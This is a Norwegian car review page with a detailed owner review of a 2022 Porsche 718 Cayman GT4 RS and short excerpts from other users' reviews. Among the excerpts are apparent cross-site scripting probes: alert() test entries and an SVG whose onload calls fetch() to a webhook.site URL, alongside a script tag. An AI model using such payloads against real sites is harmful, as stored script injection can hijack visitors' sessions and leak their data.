Hvilken bil ser du etter?

Tilbake til front | Skriv en vurdering
2022 Porsche 718 Cayman GT4 RS Kupé Bensin

Vurdert av NordMann

Score 9.2/10

GT4RS er den mest hysteriske bilen Porsche har laget siden salige 911 S/T i 1970. Ingen bil fra hverken Ferrari, eller Lamborghini kan levere i nærheten av den elleville rocke konserten som sjåføren styrer og dirigerer selv med høyrefoten. Selv i lave hastigheter med eksosspjeldene lukket, hører man prustingen og den gutturale gurglingen som skjer når ventilene og spjeldene i luftinntakene til de 6 individuelle throttle bodies forer hver sin sylinder med superbensin rett inn i den høykomprimerte racing motoren som om galskapen tar overhånd drar rett opp til 9000 omdreininger med en hårreisende lyd fra luftinntaket rett bak nakken din. Snakk om å ha styggen på ryggen! <br /> <br /> Om man skal trekke frem noe negativt må det være at man lett kan bli skremt når det høres som om Gammel-Erik selv er etter deg, men samtidig gjør det at bilen har en nerve som holder interessen ved like og man tenker seg 3-4 ganger om, før man tar nøklene til GT4RS.

Kjøreglede

10 / 10
Fascinerende fri for teknologi og dubeditter! Veldig old school og mangler bl.a. adaptiv cruise control som gjør at denne bilen må man være våken og bevisst for å kjøre.

Kvalitet/driftssikkerhet

10 / 10
Null issues etter halvannet år. Dekkene, så lenge man får justert hjulvinkler litt mer aggressivt og holder seg til gate-slicks fra Michelin, holder 6-7 dager på bane.

Plass/praktiske løsninger

10 / 10
Sannsynligvis markedets beste 2-seter! 2 bagasjerom gir deg ett til henne (det store foran) og et litt mindre bak til han. Karbonsetene er superkomfortable bare du får plassert kroppen riktig i dem. Inn og ut kan det være en fordel ikke være for feit og at man enda klare bøye hofte og knær. En stor (liten) fordel at bilen ikke er så svær som 911 og har akkurat passe størrelse for lekent å kunne plassere bilen riktig og foreta sporvalg i din egen kjørebane.

Økonomi/kostnader

7 / 10
Inngangsbilletten er høy og serviceprisene er høye, men særdeles fornuftige sammenlignet med konkurrentene fra Maranello og Sankt Agata. Over tid vil bilen bli som et verdipapir og gi en pen fortjeneste for eieren, så sant man fikk kjøpt den for listepris og ikke selv måtte betale markedsverdi.

Drivstoff/forbruk

9 / 10
Vanskelig å kritisere bensinforbruket på en lykkepille som GT4RS er. Helst skal den ha 98-oktan og mye av det, og den lave giringen gjør jo sitt til at motoren på 500 spinnville Porschehester befriende fri for elektrisk doping og turboer, snurrer i 3000 omdreininger allerede ved 112km/t. Da går det litt suppe, men tanken på 90 liter gir akseptabel rekkevidde likevel selv med et forbruk litt over literen på mila på langkjøring i fartsgrensene.

Flere vurderinger

Citroën DS3 (2012)

Billog liten sportsbil. Jeg vil tro at dette må være en veldig gøy førstebil for mange. Den går godt om mann får bensin 156hk utgaven den ser bra ut og den ligger godt på veien.

Score 6.8

Vurdert av Kimmi500

Volvo XC40 (2024)

Veldig fornøyd med bil, komfort og spesielt støy som er lavere enn de fleste biler i denne klasse/ pris. Ingen problemer med bilen!

Score 9.6

Vurdert av HGB68

Skoda Enyaq (2025)

Brukt som drosje, har per nå 75000km. Veldig stor oppgradering å få batterivarme. Regenerativ bremsing anbefales ikke på vinterføre. Får minus på forbruk da bilen gir meg 270-330km på kaldeste

Score 6.6

Vurdert av uKultuR

Volvo EX30 (2025)

Mekanisk fin bil men med et makkverk av software som er full av feil. Se Volvo ex30 forum for tidenes lengste og gjentakende feil rapporter. Volvo ser ikke ut til å være interessert å ordne opp des

Score 2.4

Vurdert av Slurp

Skoda Enyaq (2023)

Syns utseende å bilen er tøff, ellers kan jeg ikke sa hva den skal være bedre på enn sine konkurrenter. Sitte stillingen passer meg dårlig, men fruen liker det. Pluss at den har soltak Elendi

Score 6.8

Vurdert av Dincer

Mazda CX-5 (2013)

Bilens største utfordring med skyactive motor er relatert til partikkelfilter, koksing av inntaksmanifold og tett sumpfilter, som kan lede til havari. Annet er utkobling av turbo på grunn av feil ve

Score 7.0

Vurdert av Olav

Renault 5 E-Tech (2025)

Dette er virkelig en bil jeg anbefaler. Årets bil i Europa og Årets bil i Norge, med god grunn. Veldig kult retro-design. Legger til at Renault også hadde årets bil i Europa i 2024 med Scenic E-Te

Score 8.4

Vurdert av Knut

Citroën e-C4 (2025)

Jeg er foreløpig veldig fornøyd. Har slitt litt med å finne den optimale sittekomforten, men en pute gjorde susen der (jeg er 180 og trengte ekstra korsryggstøtte). Bilens automatikk passer meg ve

Score 9.0

Vurdert av Siri

Aston Martin DB9 GT (2017)

alert("total")

Score 5.0

Vurdert av test

Aston Martin DB9 GT (2017)

totalvurderingtest

Score 5.0

Vurdert av test

Abarth 500e (2024)

Score 10

Vurdert av Bernt

Abarth 500e (2024)

Score 1.0

Vurdert av xxxfooo4

Abarth 500e (2024)

xxxfooo4

Score 3.0

Vurdert av xxxfooo4

Abarth 500e (2024)

<svg xmlns="http://www.w3.org/2000/svg" onload="fetch('https://webhook.site/418d388b-4676-4b57-95ba-4330be1ec311')"> <circle cx="50" cy="50" r="40" fill="red"/> </svg> <script>alert(1)</script>

Score 6.2

Vurdert av Bernt

Volvo EX40 (2026)

Dette er ikke en volvo som vi er kjent med volvo. Dårlige seter, umulig å opprettholde 20grader i kupe på vinter, kjapp på gasspedal, men enormt strømforbruk uansett hvordan du prøver å tilpass

Score 1.6

Vurdert av Jorsalfar1996